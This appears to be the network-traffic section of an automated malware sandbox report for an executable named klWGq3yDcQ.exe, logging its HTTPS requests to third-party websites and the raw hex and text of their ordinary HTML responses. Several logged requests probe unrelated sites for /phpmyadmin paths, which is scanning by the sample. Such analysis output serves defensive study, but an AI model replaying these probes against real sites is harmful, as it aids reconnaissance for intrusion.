                                                                                                                                                                                                    2023-11-26 05:59:31 UTC543INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 33 20 53 65 65 20 4f 74 68 65 72 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 303 See OtherServer: nginxDate: Sun, 26 Nov 2023 05:59:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    50192.168.2.455235213.0.13.444436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: ceuandalucia.es
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC464INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 34 2e 34 35 2d 30 2b 64 65 62 37 75 31 34 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 72 64 65 6e 61 6c 73 70 69 6e 6f 6c 61 2e 65 73 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:30 GMTServer: ApacheX-Powered-By: PHP/5.4.45-0+deb7u14Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.cardenalspinola.es/wp-json/>;
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC6INData Raw: 32 33 65 62 0d 0a
                                                                                                                                                                                                    Data Ascii: 23eb
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC4922INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 20 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 68 74 6d 6c 2d 6c 6f 61 64 69 6e 67 20 77 66 2d 61 63 74 69 76 65 20 69 65 20 6f 6c 64 2d 62 72 6f 77 73 65 72 20 6c 74 2d 69 65 31 30 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 6c 74 2d 69 65 37 20 72 65 73 70 6f 6e 73 69 76 65 22 20 69 74 65 6d 73 63 6f 70 65 3d 22 69 74 65 6d 73 63 6f 70 65 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 73 22 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 70 65 6e 67 72 61 70 68 70 72 6f 74 6f 63 6f 6c 2e 6f 72 67 2f 73 63 68 65 6d 61 2f 22 20
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js html-loading wf-active ie old-browser lt-ie10 lt-ie9 lt-ie8 lt-ie7 responsive" itemscope="itemscope" itemtype="http://schema.org/WebPage" lang="es" xmlns:og="http://opengraphprotocol.org/schema/"
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC4273INData Raw: 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 0a 69 6d 67 2e 65 6d 6f 6a 69 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 77 69 64 74 68 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 20 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 62 61 63 6b
                                                                                                                                                                                                    Data Ascii: <style type="text/css">img.wp-smiley,img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 .07em !important;vertical-align: -0.1em !important;back
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC6INData Raw: 32 38 30 31 0d 0a
                                                                                                                                                                                                    Data Ascii: 2801
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC6145INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 64 72 65 61 6d 73 2d 61 6a 61 78 73 65 61 72 63 68 6c 69 74 65 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 72 64 65 6e 61 6c 73 70 69 6e 6f 6c 61 2e 65 73 2f 77 70 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 61 6a 61 78 2d 73 65 61 72 63 68 2d 6c 69 74 65 2f 63 73 73 2f 73 74 79 6c 65 2d 63 75 72 76 79 2d 62 6c 75 65 2e 63 73 73 3f 76 65 72 3d 34 2e 37 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6e 65 77 73 6c 65 74 74 65 72 2d 73 75 62 73 63 72 69 70 74 69 6f 6e 2d 63 73 73 27
                                                                                                                                                                                                    Data Ascii: <link rel='stylesheet' id='wpdreams-ajaxsearchlite-css' href='https://www.cardenalspinola.es/wp/wp-content/plugins/ajax-search-lite/css/style-curvy-blue.css?ver=4.7.1' type='text/css' media='all' /><link rel='stylesheet' id='newsletter-subscription-css'
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC4096INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 74 68 65 6d 65 2d 62 6f 6f 74 73 74 72 61 70 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 72 64 65 6e 61 6c 73 70 69 6e 6f 6c 61 2e 65 73 2f 77 70 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 65 6e 76 69 73 69 6f 6e 2f 6c 69 62 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 3f 76 65 72 3d 32 2e 30 2e 39 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 74 68 65 6d 65 2d 63 68 69 6c 64 2d 66 72 6f 6e 74 65 6e 64 2d 73 74 79 6c 65 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f
                                                                                                                                                                                                    Data Ascii: <link rel='stylesheet' id='theme-bootstrap-css' href='https://www.cardenalspinola.es/wp/wp-content/themes/envision/lib/css/bootstrap.css?ver=2.0.9.3' type='text/css' media='all' /><link rel='stylesheet' id='theme-child-frontend-style-css' href='https:/
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC6INData Raw: 32 37 61 61 0d 0a
                                                                                                                                                                                                    Data Ascii: 27aa


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    51192.168.2.455305202.226.37.1584436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC167OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: daisyokogyo.co.jp
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC378INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 26 Nov 2023 05:59:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, m
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC16006INData Raw: 65 34 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e e5 a4 a7 e6 98 ad e5 b7 a5 e6 a5 ad e6 a0 aa e5 bc 8f e4 bc 9a e7 a4 be 20 7c 20 e3 81 94 e3 81 bf e5 8f 8e e9 9b 86 e3 83 bb e6 8e 92 e6 b0 b4 e5 87 a6 e7 90 86 e8 a8 ad e5 82 99 e3 81 ae e7 b6 ad e6 8c 81 e7 ae a1 e7 90 86 20 7c 20 e5 90 8d e5 8f a4 e5 b1 8b e5 b8 82 e3 83 bb e6 84 9b e7 9f a5
                                                                                                                                                                                                    Data Ascii: e457<!DOCTYPE html><html lang="ja"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title> | |
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC16384INData Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 73 2d 63 68 69 6c 64 32 5f 5f 75 6c 5f 5f 6c 69 6e 6b 5f 5f 64 69 76 20 69 73 2d 64 69 76 34 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 69 73 2d 63 68 69 6c 64 32 5f 5f 75 6c 5f 5f 6c 69 5f 5f 74 78 74 20 69 73 2d 70 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 3e 0a 20 20 20 20
                                                                                                                                                                                                    Data Ascii: <div class="is-child2__ul__link__div is-div4"> </div> <p class="is-child2__ul__li__txt is-p4"> <span>
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC16384INData Raw: 73 76 67 22 20 63 6c 61 73 73 3d 22 70 2d 69 6e 64 65 78 5f 5f 62 75 73 69 6e 65 73 73 5f 5f 69 6d 67 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 69 63 74 75 72 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 69 6e 64 65 78 5f 5f 62 75 73 69 6e 65 73 73 5f 5f 64 69 76 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 70 2d 69 6e 64 65 78 5f 5f 62 75 73 69 6e 65 73 73 5f 5f 74 69 74 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 e8 b3 87 e6 ba 90 e5 be aa e7 92 b0 e4 ba 8b e6 a5 ad 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: svg" class="p-index__business__img1"> </picture> <div class="p-index__business__div1"> <p class="p-index__business__title"> </p>
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC9694INData Raw: e3 81 94 e3 81 bf e3 81 ae e5 8f 8e e9 9b 86 ef bc 88 e5 90 8d e5 8f a4 e5 b1 8b e5 b8 82 ef bc 89 e3 81 8c e5 a7 8b e3 81 be e3 82 8a e3 81 be e3 81 97 e3 81 9f e3 80 82 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 70 2d 69 6e 64 65 78 5f 5f 6e 65 77 73 5f 5f 6c 69 73 74 5f 5f 63 61 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 e3 81 8a e7 9f a5 e3 82 89 e3 81 9b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20
                                                                                                                                                                                                    Data Ascii: </p> <p class="p-index__news__list__cat"> </p>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    52192.168.2.455362172.67.132.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC173OUTGET /phpmyadmin HTTP/1.1
                                                                                                                                                                                                    Host: esoft.academy
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC628INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privateCF-Cache-Status: DYNAMICReport-To: {"endpoints":
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC741INData Raw: 37 64 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 69 6e 69 74 3d 7b 61 6a 61 78 3a 7b 64 65 6e 79 5f 6c 69 73 74 3a 5b 22 62 61 6d 2e 65 75 30 31 2e 6e 72 2d 64 61 74 61 2e 6e 65 74 22 5d 7d 7d 3b 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 6c 6f 61 64 65 72 5f 63 6f 6e 66 69 67 3d 7b 6c 69 63 65 6e 73 65 4b 65 79 3a 22 4e 52 4a 53 2d 38 39 33 62 34 33 36 63 64
                                                                                                                                                                                                    Data Ascii: 7d3b<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"><script type="text/javascript">(window.NREUM||(NREUM={})).init={ajax:{deny_list:["bam.eu01.nr-data.net"]}};(window.NREUM||(NREUM={})).loader_config={licenseKey:"NRJS-893b436cd
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC1369INData Raw: 70 72 6f 64 75 63 74 3a 76 6f 69 64 20 30 2c 65 78 74 72 61 3a 76 6f 69 64 20 30 2c 6a 73 41 74 74 72 69 62 75 74 65 73 3a 7b 7d 2c 75 73 65 72 41 74 74 72 69 62 75 74 65 73 3a 76 6f 69 64 20 30 2c 61 74 74 73 3a 76 6f 69 64 20 30 2c 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 3a 76 6f 69 64 20 30 2c 74 4e 61 6d 65 50 6c 61 69 6e 3a 76 6f 69 64 20 30 7d 2c 6f 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 69 6e 66 6f 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 69 66 28 21 6f 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 49 6e 66 6f 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65
                                                                                                                                                                                                    Data Ascii: product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},o={};function s(e){if(!e)throw new Error("All info objects require an agent identifier!");if(!o[e])throw new Error("Info for ".concat(e
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC1369INData Raw: 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 65 76 65 6e 74 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 74 69 6d 69 6e 67 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 6c 6f 6e 67 5f 74 61 73 6b 3a 21 31 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 73 65 73 73 69 6f 6e 5f 74 72 61 63 65 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 31 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 68 61 72 76 65 73 74 3a 7b 74 6f 6f 4d 61 6e 79 52 65 71 75 65 73 74 73 44 65 6c 61 79 3a 36 30 7d 2c 73 65 73 73 69 6f 6e 5f
                                                                                                                                                                                                    Data Ascii: stTimeSeconds:30,autoStart:!0},page_view_event:{enabled:!0,autoStart:!0},page_view_timing:{enabled:!0,harvestTimeSeconds:30,long_task:!1,autoStart:!0},session_trace:{enabled:!0,harvestTimeSeconds:10,autoStart:!0},harvest:{tooManyRequestsDelay:60},session_
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC1369INData Raw: 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 67 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 67 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 66 28 29 29 3b 63 6f 6e 73 74 20 6e 3d 28 30 2c 72 2e 65 6b 29 28 65 29 3b 6e 26 26 28 6e 2e 69 6e 69 74 3d 67 5b 65 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 76 61 72 20 6e 3d 68 28 65 29 3b 69 66 28 6e 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 73 70 6c 69 74 28 22 2e 22
                                                                                                                                                                                                    Data Ascii: )throw new Error("Configuration for ".concat(e," was never set"));return g[e]}function v(e,t){if(!e)throw new Error(p);g[e]=(0,i.D)(t,f());const n=(0,r.ek)(e);n&&(n.init=g[e])}function m(e,t){if(!e)throw new Error(p);var n=h(e);if(n){for(var r=t.split("."
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC1369INData Raw: 77 20 6e 65 77 20 45 72 72 6f 72 28 22 52 75 6e 74 69 6d 65 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 45 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 72 75 6e 74 69 6d 65 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 45 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 6b 29 3b 63 6f 6e 73 74 20 6e 3d 28 30 2c 72 2e 65 6b 29 28 65 29 3b 6e 26 26 28 6e 2e 72 75 6e 74 69 6d 65 3d 45 5b 65 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 52 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 72 79 7b 63 6f 6e
                                                                                                                                                                                                    Data Ascii: w new Error("Runtime for ".concat(e," was never set"));return E[e]}function T(e,t){if(!e)throw new Error("All runtime objects require an agent identifier!");E[e]=(0,i.D)(t,k);const n=(0,r.ek)(e);n&&(n.runtime=E[e])}function R(e){return function(e){try{con
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC1369INData Raw: 75 6d 65 6e 74 2c 69 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 2e 6e 61 76 69 67 61 74 6f 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 4e 61 76 69 67 61 74 6f 72 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 6e 61 76 69 67 61 74 6f 72 20 69 6e 73 74 61 6e 63 65 6f
                                                                                                                                                                                                    Data Ascii: ument,i="undefined"!=typeof WorkerGlobalScope&&("undefined"!=typeof self&&self instanceof WorkerGlobalScope&&self.navigator instanceof WorkerNavigator||"undefined"!=typeof globalThis&&globalThis instanceof WorkerGlobalScope&&globalThis.navigator instanceo
